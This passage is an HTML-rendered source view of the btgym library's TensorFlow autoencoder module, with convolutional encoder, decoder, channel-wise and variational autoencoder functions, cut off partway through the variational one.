id="conv2d_encoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_encoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_encoder</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="p">(</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span 
class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;encoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Defines convolutional encoder.</span> <span class="sd"> Args:</span> <span class="sd"> x: input tensor</span> <span class="sd"> layer_config: first to last nested layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)]</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> name: str, mame scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features for every layer outer to inner,</span> <span class="sd"> level-wise list of encoding layers shapes, first ro last.</span> <span class="sd"> &quot;&quot;&quot;</span> <span 
class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">layer_shapes</span> <span class="o">=</span> <span class="p">[</span><span class="n">x</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()]</span> <span class="n">layer_outputs</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">layer_spec</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">layer_config</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">norm_layer</span><span class="p">(</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;/conv_kernels_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span> <span class="p">),</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="n">layer_spec</span><span 
class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">),</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;encoder_layer_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="p">)</span> <span class="n">layer_shapes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="o">.</span><span class="n">get_shape</span><span class="p">())</span> <span class="n">layer_outputs</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="k">return</span> <span class="n">layer_outputs</span><span class="p">,</span> <span class="n">layer_shapes</span></div> <div class="viewcode-block" id="conv2d_decoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_decoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_decoder</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="p">(</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span 
class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">1</span><span class="p">),</span> <span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">1</span><span class="p">)),</span> <span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Defines convolutional decoder.</span> <span class="sd"> Args:</span> <span class="sd"> z: tensor holding encoded state</span> <span class="sd"> layer_shapes: level-wise list of matching encoding layers shapes, last to first.</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)]</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> name: str, name scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span
class="sd"> list of tensors holding decoded features for every layer inner to outer</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">z</span> <span class="n">layer_shapes</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">layer_shapes</span><span class="p">)</span> <span class="n">layer_shapes</span><span class="o">.</span><span class="n">reverse</span><span class="p">()</span> <span class="n">layer_config</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">layer_config</span><span class="p">)</span> <span class="n">layer_config</span><span class="o">.</span><span class="n">reverse</span><span class="p">()</span> <span class="n">layer_output</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="p">(</span><span class="n">layer_spec</span><span class="p">,</span> <span class="n">layer_shape</span><span class="p">)</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="nb">zip</span><span class="p">(</span><span class="n">layer_config</span><span class="p">,</span><span class="n">layer_shapes</span><span class="p">[</span><span class="mi">1</span><span class="p">:]),</span> <span class="mi">1</span><span class="p">):</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">resize_images</span><span class="p">(</span> <span class="n">images</span><span 
class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="p">[</span><span class="nb">int</span><span class="p">(</span><span class="n">layer_shape</span><span class="p">[</span><span class="mi">1</span><span class="p">]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">layer_shape</span><span class="p">[</span><span class="mi">2</span><span class="p">])],</span> <span class="n">method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="p">)</span> <span class="n">x</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;conv_kernels_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_spec</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">),</span> <span class="n">name</span><span 
class="o">=</span><span class="s1">&#39;decoder_layer_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="p">)</span> <span class="n">layer_output</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">conv2d</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">x</span><span class="p">,</span> <span class="n">num_filters</span><span class="o">=</span><span class="n">layer_shapes</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">][</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoded_y_hat&#39;</span><span class="p">,</span> <span class="n">filter_size</span><span class="o">=</span><span class="n">layer_config</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">],</span> <span class="n">stride</span><span class="o">=</span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">layer_output</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">y_hat</span><span class="p">)</span> <span class="k">return</span> <span class="n">layer_output</span></div> <div class="viewcode-block" id="conv2d_autoencoder"><a class="viewcode-back" 
href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;base_conv2d_autoencoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span> <span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Basic convolutional autoencoder.</span> <span class="sd"> Hidden state is passed through dense linear layer.</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class to use</span> 
<span class="sd"> name: str, name scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> list of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> None value</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="c1"># Encode:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">shapes</span> <span class="o">=</span> <span class="n">conv2d_encoder</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Flatten hidden state, pass through dense :</span> <span class="n">z</span> <span class="o">=</span> <span class="n">batch_flatten</span><span class="p">(</span><span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> <span class="n">encoder_layers</span><span
class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">linear_layer_ref</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Reshape back and feed to decoder:</span> <span class="n">decoder_layers</span> <span class="o">=</span> <span class="n">conv2d_decoder</span><span class="p">(</span> <span class="n">z</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">reshape</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span><span class="p">]),</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">layer_shapes</span><span class="o">=</span><span class="n">shapes</span><span class="p">,</span> <span 
class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">decoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">return</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="kc">None</span></div> <div class="viewcode-block" id="cw_conv2d_autoencoder"><a class="viewcode-back" href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.cw_conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">cw_conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;cw_conv2d_autoencoder&#39;</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span><span class="p">,</span> <span class="o">**</span><span class="n">kwargs</span> <span 
class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Channel-wise convolutional autoencoder.</span> <span class="sd"> Hidden state is passed through dense linear layer.</span> <span class="sd"> Pain-slow, do not use.</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class to use</span> <span class="sd"> name: str, name scope</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> per-channel list of lists of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> per-channel list of lists of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> None value</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="n">ae_bank</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span
class="nb">range</span><span class="p">(</span><span class="n">inputs</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="o">-</span><span class="mi">1</span><span class="p">]):</span> <span class="c1"># Making list of list of AE&#39;s:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="n">_</span> <span class="o">=</span> <span class="n">conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="o">=</span><span class="n">inputs</span><span class="p">[</span><span class="o">...</span><span class="p">,</span> <span class="n">i</span><span class="p">][</span><span class="o">...</span><span class="p">,</span> <span class="kc">None</span><span class="p">],</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">resize_method</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear_layer_ref</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;ae_channel_</span><span class="si">{}</span><span class="s1">&#39;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span> <span class="p">)</span> <span class="n">ae</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">(</span> <span class="n">inputs</span><span class="o">=</span><span class="n">inputs</span><span class="p">[</span><span 
class="o">...</span><span class="p">,</span> <span class="n">i</span><span class="p">][</span><span class="o">...</span><span class="p">,</span> <span class="kc">None</span><span class="p">],</span> <span class="n">encoder_layers</span><span class="o">=</span><span class="n">encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="n">decoder_layers</span><span class="o">=</span><span class="n">decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="o">=</span><span class="n">y_hat</span><span class="p">,</span> <span class="p">)</span> <span class="n">ae_bank</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">)</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">z</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">cw_encoder_layers</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">cw_decoder_layers</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">ae</span> <span class="ow">in</span> <span class="n">ae_bank</span><span class="p">:</span> <span class="n">y_hat</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;y_hat&#39;</span><span class="p">])</span> <span class="n">z</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;z&#39;</span><span class="p">])</span> <span class="n">cw_encoder_layers</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;encoder_layers&#39;</span><span class="p">])</span> <span 
class="n">cw_decoder_layers</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">ae</span><span class="p">[</span><span class="s1">&#39;decoder_layers&#39;</span><span class="p">])</span> <span class="c1"># Flatten hidden state:</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">concat</span><span class="p">(</span><span class="n">z</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_state&#39;</span><span class="p">)</span> <span class="c1"># encoder_layers = []</span> <span class="c1"># for layer in zip(*cw_encoder_layers):</span> <span class="c1"># encoder_layers.append(tf.concat(layer, axis=-2))</span> <span class="c1">#</span> <span class="c1"># decoder_layers = []</span> <span class="c1"># for layer in zip(*cw_decoder_layers):</span> <span class="c1"># decoder_layers.append(tf.concat(layer, axis=-2))</span> <span class="c1"># Reshape back reconstruction:</span> <span class="n">y_hat</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">concat</span><span class="p">(</span><span class="n">y_hat</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;decoded_y_hat&#39;</span><span class="p">)</span> <span class="k">return</span> <span class="n">cw_encoder_layers</span><span class="p">,</span> <span class="n">z</span><span class="p">,</span> <span class="n">cw_decoder_layers</span><span class="p">,</span> <span class="n">y_hat</span><span class="p">,</span> <span class="kc">None</span></div> <div class="viewcode-block" id="beta_var_conv2d_autoencoder"><a class="viewcode-back" 
href="../../../../btgym.algorithms.nn.html#btgym.algorithms.nn.ae.beta_var_conv2d_autoencoder">[docs]</a><span class="k">def</span> <span class="nf">beta_var_conv2d_autoencoder</span><span class="p">(</span> <span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="p">,</span> <span class="n">resize_method</span><span class="o">=</span><span class="n">tf</span><span class="o">.</span><span class="n">image</span><span class="o">.</span><span class="n">ResizeMethod</span><span class="o">.</span><span class="n">BILINEAR</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="s1">&#39;SAME&#39;</span><span class="p">,</span> <span class="n">linear_layer_ref</span><span class="o">=</span><span class="n">linear</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;vae_conv2d&#39;</span><span class="p">,</span> <span class="n">max_batch_size</span><span class="o">=</span><span class="mi">256</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="kc">False</span> <span class="p">):</span> <span class="sd">&quot;&quot;&quot;</span> <span class="sd"> Variational autoencoder.</span> <span class="sd"> Papers:</span> <span class="sd"> https://arxiv.org/pdf/1312.6114.pdf</span> <span class="sd"> https://arxiv.org/pdf/1606.05908.pdf</span> <span class="sd"> http://www.matthey.me/pdf/betavae_iclr_2017.pdf</span> <span class="sd"> Args:</span> <span class="sd"> inputs: input tensor</span> <span class="sd"> layer_config: layers configuration list: [layer_1_config, layer_2_config,...], where:</span> <span class="sd"> layer_i_config = [num_filters(int), filter_size(list), stride(list)];</span> <span class="sd"> this list represent decoder part of autoencoder bottleneck,</span> <span class="sd"> decoder part is inferred symmetrically</span> <span class="sd"> resize_method: up-sampling method, one of supported 
tf.image.ResizeMethod&#39;s</span> <span class="sd"> pad: str, padding scheme: &#39;SAME&#39; or &#39;VALID&#39;</span> <span class="sd"> linear_layer_ref: linear layer class - not used</span> <span class="sd"> name: str, name scope</span> <span class="sd"> max_batch_size: int, dynamic batch size should be no greater than this value</span> <span class="sd"> reuse: bool</span> <span class="sd"> Returns:</span> <span class="sd"> list of tensors holding encoded features, layer_wise from outer to inner</span> <span class="sd"> tensor holding batch-wise flattened hidden state vector</span> <span class="sd"> list of tensors holding decoded features, layer-wise from inner to outer</span> <span class="sd"> tensor holding reconstructed output</span> <span class="sd"> tensor holding estimated KL divergence</span> <span class="sd"> &quot;&quot;&quot;</span> <span class="k">with</span> <span class="n">tf</span><span class="o">.</span><span class="n">variable_scope</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span><span class="p">):</span> <span class="c1"># Encode:</span> <span class="n">encoder_layers</span><span class="p">,</span> <span class="n">shapes</span> <span class="o">=</span> <span class="n">conv2d_encoder</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">inputs</span><span class="p">,</span> <span class="n">layer_config</span><span class="o">=</span><span class="n">layer_config</span><span class="p">,</span> <span class="n">pad</span><span class="o">=</span><span class="n">pad</span><span class="p">,</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="c1"># Flatten hidden state, pass through dense:</span> <span class="n">z_flat</span> <span class="o">=</span> <span class="n">batch_flatten</span><span class="p">(</span><span
class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span> <span class="n">h</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">c</span> <span class="o">=</span> <span class="n">encoder_layers</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_shape</span><span class="p">()</span><span class="o">.</span><span class="n">as_list</span><span class="p">()[</span><span class="mi">1</span><span class="p">:]</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="n">x</span><span class="o">=</span><span class="n">z_flat</span><span class="p">,</span> <span class="n">size</span><span class="o">=</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span class="n">c</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;enc_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="c1"># TODO: revert back to doubled Z-size</span> <span class="c1"># half_size_z = h * w * c</span> <span class="c1"># size_z = 2 * half_size_z</span> <span class="n">size_z</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">h</span> <span class="o">*</span> <span class="n">w</span> <span class="o">*</span> <span
class="n">c</span><span class="o">/</span><span class="mi">2</span><span class="p">)</span> <span class="n">z</span> <span class="o">=</span> <span class="n">tf</span><span class="o">.</span><span class="n">nn</span><span class="o">.</span><span class="n">elu</span><span class="p">(</span> <span class="n">linear</span><span class="p">(</span> <span class="c1">#x=z_flat,</span> <span class="n">x</span><span class="o">=</span><span class="n">z</span><span class="p">,</span> <span class="c1">#size=size_z,</span> <span class="n">size</span><span class="o">=</span><span class="n">size_z</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s1">&#39;hidden_dense&#39;</span><span class="p">,</span> <span class="n">initializer</span><span class="o">=</span><span class="n">normalized_columns_initializer</span><span class="p">(</span><span class="mf">1.0</span><span class="p">),</span> <span class="n">reuse</span><span class="o">=</span><span class="n">reuse</span> <span class="p">)</span> <span class="p">)</span> <span class="c1"># Get sample parameters:</span> <span class="c1">#mu, log_sigma = tf.split(z, [half_size_z, half_size_z], axis=-1)</span> <span class="n">mu</span><span class="p">,</span> <span class="n">log_sigma</span> <span class="o">=</span> <span class="n">tf</span><span 